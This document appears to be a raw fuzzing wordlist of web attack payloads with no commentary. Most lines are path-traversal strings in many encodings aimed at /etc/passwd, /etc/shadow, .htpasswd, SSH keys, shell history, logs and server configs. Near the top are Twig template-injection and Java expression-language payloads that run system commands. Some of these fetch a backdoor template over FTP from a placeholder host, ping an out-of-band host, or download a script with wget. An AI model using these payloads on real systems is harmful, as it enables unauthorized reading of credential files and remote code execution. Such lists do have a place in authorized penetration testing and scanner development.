/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow | |
c:\apache\logs\access.log | |
c:\apache\logs\error.log | |
{{dump(app)}} | |
{{app.request.server.all|join(',')}} | |
"{{'/etc/passwd'|file_excerpt(1,30)}}"@ | |
{{self}} | |
{{_self.env.setCache("ftp://$collabplz:21")}}{{_self.env.loadTemplate("backdoor")}} | |
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} | |
{{['id']|filter('system')}} | |
{{['cat\x20/etc/passwd']|filter('system')}} | |
{{['cat$IFS/etc/passwd']|filter('system')}} | |
c:\AppServ\MySQL | |
C:/boot.ini | |
C:\boot.ini | |
/C:/inetpub/ftproot/ | |
''.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec(<COMMAND STRING/ARRAY>) | |
''.class.forName('java.lang.ProcessBuilder').getDeclaredConstructors()[1].newInstance(<COMMAND ARRAY/LIST>).start() | |
#{session.setAttribute("rtc","".getClass().forName("java.lang.Runtime").getDeclaredConstructors()[0])} | |
#{session.getAttribute("rtc").setAccessible(true)} | |
#{session.getAttribute("rtc").getRuntime().exec("/bin/bash -c whoami")} | |
${request.setAttribute("c","".getClass().forName("java.util.ArrayList").newInstance())} | |
${request.getAttribute("c").add("cmd.exe")} | |
${request.getAttribute("c").add("/k")} | |
${request.getAttribute("c").add("ping $collabplz")} | |
${request.setAttribute("a","".getClass().forName("java.lang.ProcessBuilder").getDeclaredConstructors()[0].newInstance(request.getAttribute("c")).start())} | |
${request.getAttribute("a")} | |
${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")} | |
${request.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(\\\"ping $collabplz\\\")"))} | |
${facesContext.getExternalContext().setResponseHeader("output","".getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval(\"var x=new java.lang.ProcessBuilder;x.command(\\\"wget\\\",\\\"http://x.x.x.x/1.sh\\\");org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\"))} | |
C:/inetpub/wwwroot/global.asa | |
C:\inetpub\wwwroot\global.asa | |
c:\inetpub\wwwroot\index.asp | |
/config.asp | |
../config.asp | |
config.asp | |
../config.inc.php | |
config.inc.php | |
../config.js | |
config.js | |
_config.php | |
../_config.php | |
../config.php | |
config.php | |
../_config.php%00 | |
../../../../../../../../conf/server.xml | |
/core/config.php | |
/C:\Program Files\ | |
c:\Program Files\Apache Group\Apache\logs\access.log | |
c:\Program Files\Apache Group\Apache\logs\error.log | |
/.cshrc | |
c:\System32\Inetsrv\metabase.xml | |
c:WINDOWS/system32/ | |
d:\AppServ\MySQL | |
database.asp | |
database.js | |
database.php | |
data.php | |
dbase.php a | |
db.php | |
../../../../../../../dev | |
/D:\Program Files\ | |
d:\System32\Inetsrv\metabase.xml | |
/etc/apache2/apache2.conf | |
/etc/apache2/conf/httpd.conf | |
/etc/apache2/httpd.conf | |
/etc/apache2/sites-available/default | |
/etc/apache2/vhosts.d/default_vhost.include | |
/etc/apache/apache.conf | |
/etc/apache/conf/httpd.conf | |
/etc/apache/httpd.conf | |
/etc/apt/sources.list | |
/etc/chrootUsers | |
/etc/crontab | |
/etc/defaultdomain | |
/etc/default/passwd | |
/etc/defaultrouter | |
/etc/fstab | |
/etc/ftpchroot | |
/etc/ftphosts | |
/etc/group | |
/etc/hostname.bge | |
/etc/hostname.ce0 | |
/etc/hostname.ce1 | |
/etc/hostname.ce2 | |
/etc/hostname.ce3 | |
/etc/hostname.dcelx0 | |
/etc/hostname.dcelx1 | |
/etc/hostname.dcelx2 | |
/etc/hostname.dcelx3 | |
/etc/hostname.dmfe0 | |
/etc/hostname.dmfe1 | |
/etc/hostname.dmfe2 | |
/etc/hostname.dmfe3 | |
/etc/hostname.dnet0 | |
/etc/hostname.dnet1 | |
/etc/hostname.dnet2 | |
/etc/hostname.dnet3 | |
/etc/hostname.ecn0 | |
/etc/hostname.ecn1 | |
/etc/hostname.ecn2 | |
/etc/hostname.ecn3 | |
/etc/hostname.elx0 | |
/etc/hostname.elx1 | |
/etc/hostname.elx2 | |
/etc/hostname.elx3 | |
/etc/hostname.elxl0 | |
/etc/hostname.elxl1 | |
/etc/hostname.elxl2 | |
/etc/hostname.elxl3 | |
/etc/hostname.eri0 | |
/etc/hostname.eri1 | |
/etc/hostname.eri2 | |
/etc/hostname.eri3 | |
/etc/hostname.ge0 | |
/etc/hostname.ge1 | |
/etc/hostname.ge2 | |
/etc/hostname.ge3 | |
/etc/hostname.hme0 | |
/etc/hostname.hme1 | |
/etc/hostname.hme2 | |
/etc/hostname.hme3 | |
/etc/hostname.ieef0 | |
/etc/hostname.ieef1 | |
/etc/hostname.ieef2 | |
/etc/hostname.ieef3 | |
/etc/hostname.iprb0 | |
/etc/hostname.iprb1 | |
/etc/hostname.iprb2 | |
/etc/hostname.iprb3 | |
/etc/hostname.le0 | |
/etc/hostname.le1 | |
/etc/hostname.le2 | |
/etc/hostname.le3 | |
/etc/hostname.lo | |
/etc/hostname.pcn0 | |
/etc/hostname.pcn1 | |
/etc/hostname.pcn2 | |
/etc/hostname.pcn3 | |
/etc/hostname.qfe0 | |
/etc/hostname.qfe1 | |
/etc/hostname.qfe2 | |
/etc/hostname.qfe3 | |
/etc/hostname.spwr0 | |
/etc/hostname.spwr1 | |
/etc/hostname.spwr2 | |
/etc/hostname.spwr3 | |
/etc/hosts | |
../../../../../../../../../../../../etc/hosts | |
../../../../../../../../../../../../etc/hosts%00 | |
/etc/hosts.allow | |
/etc/hosts.deny | |
/etc/hosts.equiv | |
/etc/http/conf/httpd.conf | |
/etc/httpd.conf | |
/etc/httpd/conf.d/php.conf | |
/etc/httpd/conf.d/squirrelmail.conf | |
/etc/httpd/conf.d/ssl.conf | |
/etc/httpd/conf/httpd.conf | |
/etc/httpd/httpd.conf | |
/etc/httpd/logs/acces_log | |
/etc/httpd/logs/acces.log | |
../../../../../../../etc/httpd/logs/acces_log | |
../../../../../../../etc/httpd/logs/acces.log | |
/etc/httpd/logs/access_log | |
/etc/httpd/logs/access.log | |
../../../../../etc/httpd/logs/access_log | |
../../../../../etc/httpd/logs/access.log | |
/etc/httpd/logs/error_log | |
/etc/httpd/logs/error.log | |
../../../../../../../etc/httpd/logs/error_log | |
../../../../../../../etc/httpd/logs/error.log | |
../../../../../etc/httpd/logs/error_log | |
../../../../../etc/httpd/logs/error.log | |
/etc/httpd/php.ini | |
/etc/http/httpd.conf | |
/etc/inetd.conf | |
/etc/init.d/apache | |
/etc/init.d/apache2 | |
/etc/issue | |
/etc/logrotate.d/ftp | |
/etc/logrotate.d/httpd | |
/etc/logrotate.d/proftpd | |
/etc/logrotate.d/vsftpd.log | |
/etc/mail/access | |
/etc/mailman/mm_cfg.py | |
/etc/make.conf | |
/etc/master.passwd | |
/etc/motd | |
/etc/my.cnf | |
/etc/mysql/my.cnf | |
/etc/netconfig | |
/etc/nsswitch.conf | |
/etc/opt/ipf/ipf.conf | |
/etc/opt/ipf/ipnat.conf | |
/./././././././././././etc/passwd | |
/../../../../../../../../../../etc/passwd | |
/../../../../../../../../../../etc/passwd^^ | |
/..\../..\../..\../..\../..\../..\../etc/passwd | |
/etc/passwd | |
../../../../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../etc/passwd | |
../../../../../../../../../etc/passwd | |
../../../../../../../../etc/passwd | |
../../../../../../../etc/passwd | |
../../../../../../etc/passwd | |
../../../../../etc/passwd | |
../../../../etc/passwd | |
../../../etc/passwd | |
../../etc/passwd | |
../etc/passwd | |
..\..\..\..\..\..\..\..\..\..\etc\passwd | |
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd | |
\..\..\..\..\..\..\..\..\..\..\etc\passwd | |
etc/passwd | |
/etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../../etc/passwd%00 | |
../../../../../../../../../etc/passwd%00 | |
../../../../../../../../etc/passwd%00 | |
../../../../../../../etc/passwd%00 | |
../../../../../../etc/passwd%00 | |
../../../../../etc/passwd%00 | |
../../../../etc/passwd%00 | |
../../../etc/passwd%00 | |
../../etc/passwd%00 | |
../etc/passwd%00 | |
..\..\..\..\..\..\..\..\..\..\etc\passwd%00 | |
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 | |
/../../../../../../../../../../../etc/passwd%00.html | |
/../../../../../../../../../../../etc/passwd%00.jpg | |
../../../../../../etc/passwd&=%3C%3C%3C%3C | |
/etc/php4.4/fcgi/php.ini | |
/etc/php4/apache2/php.ini | |
/etc/php4/apache/php.ini | |
/etc/php4/cgi/php.ini | |
/etc/php5/apache2/php.ini | |
/etc/php5/apache/php.ini | |
/etc/php5/cgi/php.ini | |
/etc/php/apache2/php.ini | |
/etc/php/apache/php.ini | |
/etc/php/cgi/php.ini | |
/etc/php.d/dom.ini | |
/etc/php.d/gd.ini | |
/etc/php.d/imap.ini | |
/etc/php.d/json.ini | |
/etc/php.d/ldap.ini | |
/etc/php.d/mbstring.ini | |
/etc/php.d/mysqli.ini | |
/etc/php.d/mysql.ini | |
/etc/php.d/odbc.ini | |
/etc/php.d/pdo.ini | |
/etc/php.d/pdo_mysql.ini | |
/etc/php.d/pdo_odbc.ini | |
/etc/php.d/pdo_pgsql.ini | |
/etc/php.d/pdo_sqlite.ini | |
/etc/php.d/pgsql.ini | |
/etc/php.d/xmlreader.ini | |
/etc/php.d/xmlwriter.ini | |
/etc/php.d/xsl.ini | |
/etc/php.d/zip.ini | |
/etc/php.ini | |
/etc/php/php4/php.ini | |
/etc/php/php.ini | |
/etc/postfix/mydomains | |
/etc/proftp.conf | |
/etc/proftpd/modules.conf | |
/etc/protpd/proftpd.conf | |
/etc/pure-ftpd.conf | |
/etc/pureftpd.passwd | |
/etc/pureftpd.pdb | |
/etc/pure-ftpd/pure-ftpd.conf | |
/etc/pure-ftpd/pure-ftpd.pdb | |
/etc/pure-ftpd/pureftpd.pdb | |
/etc/release | |
/etc/resolv.conf | |
/etc/rpc | |
/etc/security/environ | |
/etc/security/failedlogin | |
/etc/security/group | |
/etc/security/lastlog | |
/etc/security/limits | |
/etc/security/passwd | |
/etc/security/user | |
/./././././././././././etc/shadow | |
/../../../../../../../../../../etc/shadow | |
/../../../../../../../../../../etc/shadow^^ | |
/..\../..\../..\../..\../..\../..\../etc/shadow | |
/etc/shadow | |
../../../../../../../../../../../../etc/shadow | |
..\..\..\..\..\..\..\..\..\..\etc\shadow | |
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow | |
\..\..\..\..\..\..\..\..\..\..\etc\shadow | |
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00 | |
../../../../../../../../../../../../etc/shadow%00 | |
..\..\..\..\..\..\..\..\..\..\etc\shadow%00 | |
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 | |
etc/shadow%00 | |
/etc/ssh/sshd_config | |
/etc/sudoers | |
/etc/syslog.conf | |
/etc/syslogd.conf | |
/etc/system | |
/etc/updatedb.conf | |
/etc/utmp | |
/etc/vfstab | |
/etc/vhcs2/proftpd/proftpd.conf | |
/etc/vsftpd.chroot_list | |
/etc/vsftpd.conf | |
/etc/vsftpd/vsftpd.conf | |
/etc/wtmp | |
/etc/wu-ftpd/ftpaccess | |
/etc/wu-ftpd/ftphosts | |
/etc/wu-ftpd/ftpusers | |
/.forward | |
/home2\bin\stable\apache\php.ini | |
/home/apache/conf/httpd.conf | |
/home/apache/httpd.conf | |
/home\bin\stable\apache\php.ini | |
/.htpasswd | |
.htpasswd | |
../.htpasswd | |
../install.php | |
install.php | |
../../../../../../../../../../../../localstart.asp | |
../../../../../../../../../../../../localstart.asp%00 | |
/log/miscDir/accesslog | |
/.logout | |
/logs/access_log | |
/logs/access.log | |
../../../../../logs/access.log | |
../../../../logs/access.log | |
../../../logs/access.log | |
../../logs/access.log | |
../logs/access.log | |
/logs/error_log | |
/logs/error.log | |
../../../../../logs/error.log | |
../../../../logs/error.log | |
../../../logs/error.log | |
../../logs/error.log | |
../logs/error.log | |
/logs/pure-ftpd.log | |
/master.passwd | |
member/.htpasswd | |
members/.htpasswd | |
/.netrc | |
/NetServer\bin\stable\apache\php.ini | |
/opt/apache2/conf/httpd.conf | |
/opt/apache/conf/httpd.conf | |
/opt/lampp/logs/access_log | |
/opt/lampp/logs/access.log | |
/opt/lampp/logs/error_log | |
/opt/lampp/logs/error.log | |
/opt/xampp/etc/php.ini | |
/opt/xampp/logs/access_log | |
/opt/xampp/logs/access.log | |
/opt/xampp/logs/error_log | |
/opt/xampp/logs/error.log | |
.pass | |
../.pass | |
pass.dat | |
passwd | |
/.passwd | |
.passwd | |
../.passwd | |
passwd.dat | |
/php4\php.ini | |
/php5\php.ini | |
/php\php.ini | |
/PHP\php.ini | |
/private/etc/httpd/httpd.conf | |
/private/etc/httpd/httpd.conf.default | |
/proc/cpuinfo | |
/proc/interrupts | |
/proc/loadavg | |
/proc/meminfo | |
/proc/mounts | |
/proc/net/arp | |
/proc/net/dev | |
/proc/net/route | |
/proc/net/tcp | |
/proc/partitions | |
/proc/self/cmdline | |
/proc/self/envron | |
/proc/version | |
/.profile | |
/Program Files\Apache Group\Apache2\conf\httpd.conf | |
/Program Files\Apache Group\Apache\conf\httpd.conf | |
/Program Files\Apache Group\Apache\logs\access.log | |
/Program Files\Apache Group\Apache\logs\error.log | |
/Program Files\xampp\apache\conf\httpd.conf | |
/../../../../pswd | |
/.rhosts | |
/root/.bash_history | |
/root/.bash_logut | |
root/.htpasswd | |
/root/.ksh_history | |
/root/.Xauthority | |
/.sh_history | |
/.shosts | |
/.ssh/authorized_keys | |
user/.htpasswd | |
../users.db.php | |
users.db.php | |
users/.htpasswd | |
/usr/apache2/conf/httpd.conf | |
/usr/apache/conf/httpd.conf | |
/usr/etc/pure-ftpd.conf | |
/usr/lib/cron/log | |
/usr/lib/php.ini | |
/usr/lib/php/php.ini | |
/usr/lib/security/mkuser.default | |
/usr/local/apache2/conf/httpd.conf | |
/usr/local/apache2/httpd.conf | |
/usr/local/apache2/logs/access_log | |
/usr/local/apache2/logs/access.log | |
/usr/local/apache2/logs/error_log | |
/usr/local/apache2/logs/error.log | |
/usr/local/apache/conf/httpd.conf | |
/usr/local/apache/conf/php.ini | |
/usr/local/apache/httpd.conf | |
/usr/local/apache/log | |
/usr/local/apache/logs | |
/usr/local/apache/logs/access_log | |
/usr/local/apache/logs/access_ log | |
/usr/local/apache/logs/access.log | |
/usr/local/apache/logs/access. log | |
../../../../../../../usr/local/apache/logs/access_ log | |
../../../../../../../usr/local/apache/logs/access. log | |
../../../../../usr/local/apache/logs/access_log | |
../../../../../usr/local/apache/logs/access.log | |
/usr/local/apache/logs/error_log | |
/usr/local/apache/logs/error.log | |
../../../../../../../usr/local/apache/logs/error_l og | |
../../../../../../../usr/local/apache/logs/error.l og | |
../../../../../usr/local/apache/logs/error_log | |
../../../../../usr/local/apache/logs/error.log | |
/usr/local/apps/apache2/conf/httpd.conf | |
/usr/local/apps/apache/conf/httpd.conf | |
/usr/local/cpanel/logs | |
/usr/local/cpanel/logs/access_log | |
/usr/local/cpanel/logs/error_log | |
/usr/local/cpanel/logs/license_log | |
/usr/local/cpanel/logs/login_log | |
/usr/local/cpanel/logs/stats_log | |
/usr/local/etc/apache2/conf/httpd.conf | |
/usr/local/etc/apache/conf/httpd.conf | |
/usr/local/etc/apache/vhosts.conf | |
/usr/local/etc/httpd/conf/httpd.conf | |
/usr/local/etc/httpd/logs/access_log | |
/usr/local/etc/httpd/logs/error_log | |
/usr/local/etc/php.ini | |
/usr/local/etc/pure-ftpd.conf | |
/usr/local/etc/pureftpd.pdb | |
/usr/local/httpd/conf/httpd.conf | |
/usr/local/lib/php.ini | |
/usr/local/php4/httpd.conf | |
/usr/local/php4/httpd.conf.php | |
/usr/local/php4/lib/php.ini | |
/usr/local/php5/httpd.conf | |
/usr/local/php5/httpd.conf.php | |
/usr/local/php5/lib/php.ini | |
/usr/local/php/httpd.conf | |
/usr/local/php/httpd.conf.php | |
/usr/local/php/lib/php.ini | |
/usr/local/pureftpd/etc/pure-ftpd.conf | |
/usr/local/pureftpd/etc/pureftpd.pdb | |
/usr/local/pureftpd/sbin/pure-config.pl | |
/usr/local/www/logs/thttpd_log | |
/usr/local/Zend/etc/php.ini | |
/usr/pkgsrc/net/pureftpd/ | |
/usr/ports/contrib/pure-ftpd/ | |
/usr/ports/ftp/pure-ftpd/ | |
/usr/ports/net/pure-ftpd/ | |
/usr/sbin/pure-config.pl | |
/usr/spool/lp/log | |
/usr/spool/mqueue/syslog | |
/var/adm | |
/var/adm/acct/sum/loginlog | |
/var/adm/aculog | |
/var/adm/aculogs | |
/var/adm/crash/unix | |
/var/adm/crash/vmcore | |
/var/adm/cron/log | |
/var/adm/dtmp | |
/var/adm/lastlog | |
/var/adm/lastlog/username | |
/var/adm/log/asppp.log | |
/var/adm/loginlog | |
/var/adm/log/xferlog | |
/var/adm/lp/lpd-errs | |
/var/adm/messages | |
/var/adm/pacct | |
/var/adm/qacct | |
/var/adm/ras/bootlog | |
/var/adm/ras/errlog | |
/var/adm/sulog | |
/var/adm/SYSLOG | |
/var/adm/utmp | |
/var/adm/utmpx | |
/var/adm/vold.log | |
/var/adm/wtmp | |
/var/adm/wtmpx | |
/var/adm/X0msgs | |
/var/apache/log | |
/var/apache/logs | |
/var/apache/logs/access_log | |
/var/apache/logs/error_log | |
/var/cpanel/cpanel.config | |
/var/cron/log | |
/var/lib/mlocate/mlocate.db | |
/var/lib/mysql/my.cnf | |
/var/local/www/conf/php.ini | |
/var/lock/samba | |
/var/log | |
/var/log/access_log | |
/var/log/access.log | |
../../../../../../../var/log/access_log | |
../../../../../../../var/log/access.log | |
../../../../../var/log/access_log | |
/var/log/acct | |
/var/log/apache2/access_log | |
/var/log/apache2/access.log | |
../../../../../../../var/log/apache2/access_log | |
../../../../../../../var/log/apache2/access.log | |
/var/log/apache2/error_log | |
/var/log/apache2/error.log | |
../../../../../../../var/log/apache2/error_log | |
../../../../../../../var/log/apache2/error.log | |
/var/log/apache/access_log | |
/var/log/apache/access.log | |
../../../../../../../var/log/apache/access_log | |
../../../../../../../var/log/apache/access.log | |
../../../../../var/log/apache/access_log | |
../../../../../var/log/apache/access.log | |
/var/log/apache/error_log | |
/var/log/apache/error.log | |
../../../../../../../var/log/apache/error_log | |
../../../../../../../var/log/apache/error.log | |
../../../../../var/log/apache/error_log | |
../../../../../var/log/apache/error.log | |
/var/log/apache-ssl/access.log | |
/var/log/apache-ssl/error.log | |
/var/log/auth | |
/var/log/authlog | |
/var/log/auth.log | |
/var/log/boot.log | |
/var/log/cron.log | |
/var/log/dmesg | |
/var/log/error_log | |
/var/log/error.log | |
../../../../../../../var/log/error_log | |
../../../../../../../var/log/error.log | |
../../../../../var/log/error_log | |
/var/log/exim_mainlog | |
/var/log/exim/mainlog | |
/var/log/exim_paniclog | |
/var/log/exim/paniclog | |
/var/log/exim_rejectlog | |
/var/log/exim/rejectlog | |
/var/log/ftplog | |
/var/log/ftp-proxy | |
/var/log/ftp-proxy/ftp-proxy.log | |
/var/log/httpd/ | |
/var/log/httpd/access_log | |
/var/log/httpd/access.log | |
../../../../../var/log/httpd/access_log | |
/var/log/httpd/error_log | |
/var/log/httpd/error.log | |
../../../../../var/log/httpd/error_log | |
/var/log/httpsd/ssl.access_log | |
/var/log/httpsd/ssl_log | |
/var/log/kern.log | |
/var/log/lastlog | |
/var/log/lighttpd | |
/var/log/maillog | |
/var/log/message | |
/var/log/messages | |
/var/log/mysqlderror.log | |
/var/log/mysqld.log | |
/var/log/mysql.log | |
/var/log/mysql/mysql-bin.log | |
/var/log/mysql/mysql.log | |
/var/log/mysql/mysql-slow.log | |
/var/log/ncftpd.errs | |
/var/log/ncftpd/misclog.txt | |
/var/log/news | |
/var/log/news.all | |
/var/log/news/news | |
/var/log/news/news.all | |
/var/log/news/news.crit | |
/var/log/news/news.err | |
/var/log/news/news.notice | |
/var/log/news/suck.err | |
/var/log/news/suck.notice | |
/var/log/nginx/access_log | |
/var/log/nginx/access.log | |
../../../../../../../var/log/nginx/access_log | |
../../../../../../../var/log/nginx/access.log | |
../../../../../var/log/nginx/access_log | |
../../../../../var/log/nginx/access.log | |
/var/log/nginx/error_log | |
/var/log/nginx/error.log | |
../../../../../../../var/log/nginx/error_log | |
../../../../../../../var/log/nginx/error.log | |
../../../../../var/log/nginx/error_log | |
../../../../../var/log/nginx/error.log | |
/var/log/poplog | |
/var/log/POPlog | |
/var/log/proftpd | |
/var/log/proftpd.access_log | |
/var/log/proftpd.xferlog | |
/var/log/proftpd/xferlog.legacy | |
/var/log/pureftpd.log | |
/var/log/pure-ftpd/pure-ftpd.log | |
/var/log/qmail | |
/var/log/qmail/ | |
/var/log/samba | |
/var/log/samba-log.%m | |
/var/log/secure | |
/var/log/smtpd | |
/var/log/spooler | |
/var/log/syslog | |
/var/log/telnetd | |
/var/log/thttpd_log | |
/var/log/utmp | |
/var/log/vsftpd.log | |
/var/log/wtmp | |
/var/log/xferlog | |
/var/log/yum.log | |
/var/lp/logs/lpNet | |
/var/lp/logs/lpsched | |
/var/lp/logs/requests | |
/var/mysql.log | |
/var/run/httpd.pid | |
/var/run/mysqld/mysqld.pid | |
/var/run/utmp | |
/var/saf/_log | |
/var/saf/port/log | |
/var/spool/errors | |
/var/spool/locks | |
/var/spool/logs | |
/var/spool/tmp | |
/var/www/conf/httpd.conf | |
/var/www/html/.htaccess | |
/var/www/localhost/htdocs/.htaccess | |
/var/www/log/access_log | |
/var/www/log/error_log | |
/../../var/www/logs/access_log | |
/var/www/logs/access_log | |
/var/www/logs/access.log | |
../../../../../../../var/www/logs/access_log | |
../../../../../../../var/www/logs/access.log | |
../../../../../var/www/logs/access.log | |
/var/www/logs/error_log | |
/var/www/logs/error.log | |
../../../../../../../var/www/logs/error_log | |
../../../../../../../var/www/logs/error.log | |
../../../../../var/www/logs/error_log | |
../../../../../var/www/logs/error.log | |
/var/www/sitename/htdocs/ | |
/var/www/vhosts/sitename/httpdocs/.htaccess | |
/var/www/web1/html/.htaccess | |
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf | |
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf | |
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf | |
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php | |
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php | |
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php | |
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini | |
/Volumes/webBackup/opt/apache2/conf/httpd.conf | |
/Volumes/webBackup/private/etc/httpd/httpd.conf | |
/Volumes/webBackup/private/etc/httpd/httpd.conf.default | |
/web/conf/php.ini | |
/WINDOWS\php.ini | |
../../windows/win.ini | |
/WINNT\php.ini | |
/..\..\..\..\..\..\winnt\win.ini | |
/www/logs/proftpd.system.log | |
/xampp\apache\bin\php.ini | |
/.Xauthority | |
..2fapache2flogs2ferror.log | |
..2fapache2flogs2faccess.log | |
..2f..2fapache2flogs2ferror.log | |
..2f..2fapache2flogs2faccess.log | |
..2f..2f..2fapache2flogs2ferror.log | |
..2f..2f..2fapache2flogs2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og | |
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log | |
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log | |
..2fetc2fpasswd | |
..2fetc2fpasswd%00 | |
..2f..2fetc2fpasswd | |
..2f..2fetc2fpasswd%00 | |
..2f..2f..2fetc2fpasswd | |
..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd | |
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 | |
